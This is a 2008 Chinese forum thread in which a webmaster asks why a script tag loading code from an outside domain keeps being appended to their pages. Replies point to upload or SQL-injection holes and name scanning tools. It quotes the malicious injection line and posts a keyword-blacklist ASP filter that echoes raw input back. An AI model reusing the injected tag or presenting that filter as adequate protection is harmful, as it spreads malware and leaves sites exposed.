28,404
社区成员
发帖
与我相关
我的任务
分享被加入恶意代码,高手帮忙
放在服务器上的网页文件老被在代码最后面加入<script language=javascript src=http://cc.18dd.net/6.js></script> 之类的代码, 怎么办啊?
...全文
请发表友善的回复…
发表回复
一把编程的菜刀 2008-10-29
- 打赏
- 举报
呵呵,是你的有漏洞
加3楼说的不太实际!
加3楼说的不太实际!
wuyq11 2008-10-29
- 打赏
- 举报
注入漏洞,添加代码
aa323 2008-10-29
- 打赏
- 举报
恩 应该是上传出问题了,因为只要是跟上传代码放一个文件夹的文件都有。可我用的是上传组件啊,组件有问题?还是我用的时候出问题了?该怎么改呢?
g125989100 :我现在发现不少页面都有啊,每个都加入你给的代码工作量也不少哦
luxu001207 : 正在找你说的软件
Jarvis-Li 2008-10-29
- 打赏
- 举报
网站是自己写的吗
要不是就是那个写的人问题
要是那就是漏洞
注入的可能性很小
要不是就是那个写的人问题
要是那就是漏洞
注入的可能性很小
fangsp 2008-10-29
- 打赏
- 举报
对 有漏洞上传了
feng2112 2008-10-29
- 打赏
- 举报
应该是有上传漏洞
不耐烦 2008-10-29
- 打赏
- 举报
防注入~!
放到页面最上面
<%
''--------定义部份------------------
dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
''自定义需要过滤的字串,用 "防" 分隔
Fy_In = "''防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_Inf = split(Fy_In, "防")
if Request.form<>"" then
for each Fy_Post In Request.form
for Fy_Xh = 0 to ubound(Fy_Inf)
if instr(lcase(Request.form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 then
Response.write "非法操作!本站已经给大侠您做了如下记录↓<br>"
Response.write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.write "操作时间:"&now&"<br>"
Response.write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.write "提交方式:POST<br>"
Response.write "提交参数:"&Fy_Post&"<br>"
Response.write "提交数据:"&Request.form(Fy_Post)
Response.end
end if
next
next
end if
if Request.QueryString<>"" then
for each Fy_Get In Request.QueryString
for Fy_Xh = 0 to ubound(Fy_Inf)
if instr(lcase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 then
Response.write "非法操作!本站已经给大侠您做了如下记录↓<br>"
Response.write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.write "操作时间:"&now&"<br>"
Response.write "操作页面:"&Request.ServerVariables("URL")&"<br>"
Response.write "提交方式:GET<br>"
Response.write "提交参数:"&Fy_Get&"<br>"
Response.write "提交数据:"&Request.QueryString(Fy_Get)
Response.end
end if
next
next
end if
%>放到页面最上面
Atai-Lu 2008-10-29
- 打赏
- 举报
可能有注入漏洞,可能是上传漏洞,你把你的网址贴上来,或者你自己找个“明小子”或者“桂林老兵”之类的工具扫下看有啥漏洞
MOTA 2008-10-29
- 打赏
- 举报
服务器被人黑了
看看哪里有上载文件的地方
看看哪里有上载文件的地方
gmlwl 2008-10-29
- 打赏
- 举报
注入漏洞,上传漏洞
如果你有上传漏洞的话,只读是没有用的。
人家可以自己上传文件管理,随意改变你的文件属性。
还是把漏洞堵上吧,最好不要用网上下载的那些程序
如果你有上传漏洞的话,只读是没有用的。
人家可以自己上传文件管理,随意改变你的文件属性。
还是把漏洞堵上吧,最好不要用网上下载的那些程序
mjjzg 2008-10-29
- 打赏
- 举报
用扫描工具扫一下吧
xiaojing7 2008-10-29
- 打赏
- 举报
注入漏洞,添加代码
ccjjww1222 2008-10-29
- 打赏
- 举报
上传漏洞 应该是
aa323 2008-10-29
- 打赏
- 举报
[Quote=引用 11 楼 ttt2 的回复:]
用ftp把文件设置成只读
[/Quote]
我就是先把那些文件都改为只读了 呵呵
明小子我一下载下来就让杀毒软件删除了 说有恶意代码 不杀我又不放心啊 万一有病毒就麻烦了 哪天找别的机子运行去
用ftp把文件设置成只读
[/Quote]
我就是先把那些文件都改为只读了 呵呵
明小子我一下载下来就让杀毒软件删除了 说有恶意代码 不杀我又不放心啊 万一有病毒就麻烦了 哪天找别的机子运行去
jankrong 2008-10-29
- 打赏
- 举报
1.检查程序漏洞并修复;
2.检查服务器漏洞并修复;(如果是你自己的服务器)
3.检查FTP服务及服务器安全策略并修正;(如果是你自己的服务器)
4.实在不行,花点银子请个hacker帮你把程序优化优化并作维护。
2.检查服务器漏洞并修复;(如果是你自己的服务器)
3.检查FTP服务及服务器安全策略并修正;(如果是你自己的服务器)
4.实在不行,花点银子请个hacker帮你把程序优化优化并作维护。
ttt2 2008-10-29
- 打赏
- 举报
用ftp把文件设置成只读
一天到晚游泳的鱼2016 2008-10-29
- 打赏
- 举报
[Quote=引用 2 楼 luxu001207 的回复:]
可能有注入漏洞,可能是上传漏洞,你把你的网址贴上来,或者你自己找个“明小子”或者“桂林老兵”之类的工具扫下看有啥漏洞
[/Quote]
对你用明小子,数据库注入,旁注都能检测出来
你程序有漏洞的
可能有注入漏洞,可能是上传漏洞,你把你的网址贴上来,或者你自己找个“明小子”或者“桂林老兵”之类的工具扫下看有啥漏洞
[/Quote]
对你用明小子,数据库注入,旁注都能检测出来
你程序有漏洞的
